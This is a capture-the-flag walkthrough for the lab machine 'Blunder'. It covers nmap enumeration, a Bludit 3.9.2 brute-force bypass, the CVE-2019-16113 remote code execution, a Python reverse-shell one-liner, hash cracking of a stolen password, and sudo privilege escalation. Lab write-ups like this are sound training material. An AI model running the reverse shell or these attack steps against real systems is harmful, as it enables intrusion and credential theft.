Blunder

Information:

Os: Linux
Difficulty: Easy
IP : 10.10.10.191

Enumaration

NMAP

nmap -sC -sS -sV -O -A -v -v 10.10.10.191

output :


PORT   STATE  SERVICE REASON         VERSION
21/tcp closed ftp     reset ttl 63
80/tcp open   http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: A0F0E5D852F0E3783AF700B6EE9D00DA
|_http-generator: Blunder
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

let's check the website (apache2 running on port 80)

apparently is a site about interesting facts

looking at the page source code we will have :

and this caught my attention :

we know the version is 3.9.2, but we need to find out which is the CMS

making a fuzzing we found some files with the name "bl-kernel"

searching over this structure I found :

ok, the site is made in bludit 3.9.2

we can try to use an exploit from CVE-2019-16113, and get a RCE (Remote Code Execution)

BUT

this exploit needs the user and password, which we do not know

so let's find out

for this, we can use :

code:

https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script/blob/master/bruteforce.py

this code takes a wordlist and tests all the words to find the password

but, we still need the user...

we return to the enumeration stage, we can find a file named "todo.txt".

now we know that there is a user called fergus

now let's test the passwords

but to generate a list of passwords that makes sense, I will use a tool called "cewl", which takes the words of a site and assembles a list

cewl 10.10.10.191 -w wordlist.txt

now let's use that code to find out the password

python3 10.10.191 fergus wordlist.txt

finally, we have the password, now use the exploit from CVE-2019-16113

Getting Shell

now we have a shell, but very bad

improving this shell

to improve this shell, we will make this connection start another shell, for this we will use :

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",3333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

(changing the ip)

(on the right screen we have the good shell, but not a tty)

to have a tty, run the command :

python -c 'import pty;pty.spawn("/bin/bash")'

now we have to try to get access to some users (www-data don't have access to the user flag)

looking for files in the www-data, I found

/var/www/bludit-3.10.0a/bl-content/databases/users.php

here we see the user (hugo) and the encrypted password

now let's break the password encryption

we need to find out which encryption was used

for this I will use a site called tunnelsup

https://www.tunnelsup.com/hash-analyzer/

breaking ( https://www.dcode.fr/sha1-hash ) :

now we have the password, let's change our user

Privilege Escalation

running

sudo -l

to see what command we can run as root without password, we see that the hugo user can use the command "(ALL, !root) /bin/bash"

searching for about this, we see that there is an exploit to escalate the privilege

Let's use it

I will download the script to my machine, and start a python http server in my folder, so in the target machine, I can download it from my ip.

now we are root, just catch the flag.

PreviousSpectra NextCap

Last updated 3 years ago

Was this helpful?